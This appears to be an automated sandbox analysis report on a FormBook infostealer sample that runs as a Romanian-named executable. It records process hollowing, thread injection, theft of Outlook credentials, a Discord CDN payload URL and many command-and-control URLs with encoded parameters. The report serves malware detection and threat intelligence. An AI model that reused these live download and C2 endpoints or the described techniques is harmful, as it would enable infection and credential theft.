Source: Yara match File source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562316 Sample: Noua lista de comenzi.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 47 www.mehfeels.com 2->47 49 www.ahmadfaizlajis.com 2->49 51 3 other IPs or domains 2->51 79 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 5 other signatures 2->85 11 Noua lista de comenzi.exe 1 17 2->11         started        signatures3 process4 dnsIp5 67 cdn.discordapp.com 162.159.134.233, 443, 49743, 49744 CLOUDFLARENETUS United States 11->67 43 C:\Users\user\Contacts\Tdfgwnfyyv.exe, PE32 11->43 dropped 45 C:\Users\...\Tdfgwnfyyv.exe:Zone.Identifier, ASCII 11->45 dropped 111 Creates multiple autostart registry keys 11->111 113 Writes to foreign memory regions 11->113 115 Allocates memory in foreign processes 11->115 117 2 other signatures 11->117 16 DpiScaling.exe 11->16         started        file6 signatures7 process8 signatures9 69 Modifies the context of a thread in another process (thread injection) 16->69 71 Maps a DLL or memory area into another process 16->71 73 Sample uses process hollowing technique 16->73 75 2 other signatures 16->75 19 explorer.exe 6 16->19 injected process10 dnsIp11 53 198.54.117.217, 49825, 80 NAMECHEAP-NETUS United States 19->53 55 www.20dzwww.com 172.120.156.91, 49820, 80 EGIHOSTINGUS United States 19->55 57 30 other IPs or domains 19->57 41 C:\Users\user\AppData\...\6ld01n28q8c.exe, PE32 19->41 dropped 87 System process connects to network (likely due to code injection or exploit) 19->87 89 Benign windows process drops PE files 19->89 91 Performs DNS queries to domains with low reputation 19->91 24 Tdfgwnfyyv.exe 13 19->24         started        28 systray.exe 1 12 19->28         started        30 Tdfgwnfyyv.exe 14 19->30         started        file12 signatures13 process14 dnsIp15 59 162.159.130.233, 443, 49747 CLOUDFLARENETUS United States 24->59 61 cdn.discordapp.com 24->61 93 Machine Learning detection for dropped file 24->93 95 Writes to foreign memory regions 24->95 97 Allocates memory in foreign processes 24->97 32 logagent.exe 24->32         started        99 Tries to steal Mail credentials (via file / registry access) 28->99 101 Creates multiple autostart registry keys 28->101 103 Modifies the context of a thread in another process (thread injection) 28->103 109 2 other signatures 28->109 35 cmd.exe 1 28->35         started        63 192.168.2.1 unknown unknown 30->63 65 cdn.discordapp.com 30->65 105 Creates a thread in another existing process (thread injection) 30->105 107 Injects a PE file into a foreign processes 30->107 37 logagent.exe 30->37         started        signatures16 process17 signatures18 77 Tries to detect virtualization through RDTSC time measurements 32->77 39 conhost.exe 35->39         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.54.117.217
 unknown United States
22612 NAMECHEAP-NETUS true
162.0.214.189
 www.bubu3cin.com Canada
35893 ACPCA false
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS false
52.89.53.122
 www.pkem.top United States
16509 AMAZON-02US true
192.0.78.240
 librairie-adrienne.com United States
2635 AUTOMATTICUS false
162.159.130.233
 unknown United States
13335 CLOUDFLARENETUS false
162.0.232.169
 game2plays.com Canada
22612 NAMECHEAP-NETUS false
119.28.141.142
 dns.zhanh.com China
132203 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN false
154.90.64.134
 www.t1uba.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK false
34.90.73.145
 www.bestpleasure4u.com United States
15169 GOOGLEUS false
34.102.136.180
 mehfeels.com United States
15169 GOOGLEUS false
157.90.247.57
 alifdanismanlik.com United States
766 REDIRISRedIRISAutonomousSystemES false
172.120.156.91
 www.20dzwww.com United States
18779 EGIHOSTINGUS true
198.54.117.215
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
206.188.193.90
 www.anniebapartments.com United States
55002 DEFENSE-NETUS false
162.159.134.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.20dzwww.com 172.120.156.91 true
www.bestpleasure4u.com 34.90.73.145 true
www.pkem.top 52.89.53.122 true
parkingpage.namecheap.com 198.54.117.215 true
cdn.discordapp.com 162.159.134.233 true
www.t1uba.com 154.90.64.134 true
mehfeels.com 34.102.136.180 true
bendyourtongue.com 34.102.136.180 true
shops.myshopify.com 23.227.38.74 true
dns.zhanh.com 119.28.141.142 true
www.bubu3cin.com 162.0.214.189 true
librairie-adrienne.com 192.0.78.240 true
a58e4c82ccde743a88da9ce6c3a75eed-962232103.ap-southeast-1.elb.amazonaws.com 3.1.123.15 true
game2plays.com 162.0.232.169 true
www.anniebapartments.com 206.188.193.90 true
alifdanismanlik.com 157.90.247.57 true
www.alert78.info unknown unknown
www.ahmadfaizlajis.com unknown unknown
www.game2plays.com unknown unknown
www.kreativevisibility.net unknown unknown
www.awp.email unknown unknown
www.librairie-adrienne.com unknown unknown
www.mehfeels.com unknown unknown
www.alifdanismanlik.com unknown unknown
www.bendyourtongue.com unknown unknown
www.handejqr.com unknown unknown
www.protection-onepa.com unknown unknown
www.fabio.tools unknown unknown
www.rematedeldia.com unknown unknown
www.cielotherepy.com unknown unknown
www.byausorsm26-plala.xyz unknown unknown
www.the-pumps.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.bubu3cin.com/euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx9 true
  • Avira URL Cloud: safe
 unknown
http://www.mehfeels.com/euv4/?BXxXk=QBHbLVxXFBQ8vZs3HYaMEcVKayZ3Jv10zmSp74hjINFs4RkrUT15e8jtDg9xTHBGuf3s&nN6=6lpDqpn0n2Bl9fTP false
  • Avira URL Cloud: safe
 unknown
http://www.cielotherepy.com/euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP true
  • Avira URL Cloud: malware
 unknown
http://www.t1uba.com/euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx9 true
  • Avira URL Cloud: safe
 unknown
http://www.20dzwww.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBU true
  • Avira URL Cloud: safe
 unknown
http://www.pkem.top/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdp true
  • Avira URL Cloud: safe
 unknown
http://www.anniebapartments.com/euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9 true
  • Avira URL Cloud: malware
 unknown
http://www.bestpleasure4u.com/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY false
  • Avira URL Cloud: safe
 unknown
http://www.librairie-adrienne.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=oa9knNpzlYsET7a400NCf8AEb2m6hfIC7IipfrPHZRwez4UH0nI2ep6CPiEzZPUmbJ08 true
  • Avira URL Cloud: safe
 unknown
http://www.game2plays.com/euv4/?BXxXk=cI3g5knJJqXkP8IW+Xza8klzbxDoXV64MSKEiVzom8B632K++iscclio36YMg8rUOzdW&x6VPE=5jf8Bvhx9 true
  • Avira URL Cloud: safe
 unknown
http://www.mehfeels.com/euv4/ false
  • Avira URL Cloud: safe
 unknown
http://www.alifdanismanlik.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehs true
  • Avira URL Cloud: malware
 unknown
http://www.bubu3cin.com/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj true
  • Avira URL Cloud: safe
 unknown
http://www.rematedeldia.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt true
  • Avira URL Cloud: malware
 unknown
www.rematedeldia.com/euv4/ true
  • Avira URL Cloud: malware
 low
http://www.the-pumps.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsU true
  • Avira URL Cloud: malware
 unknown
https://cdn.discordapp.com/attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji false
    		high
    http://www.bendyourtongue.com/euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9 false
    • Avira URL Cloud: malware
    		 unknown
    http://www.handejqr.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=85mQjwU+wMRs83r0GOSrcIreOiba9zyWW+CS0GLKbh9gHly9YGpiGKD2AN9MIjoCEE7/ true
    • Avira URL Cloud: safe
    		 unknown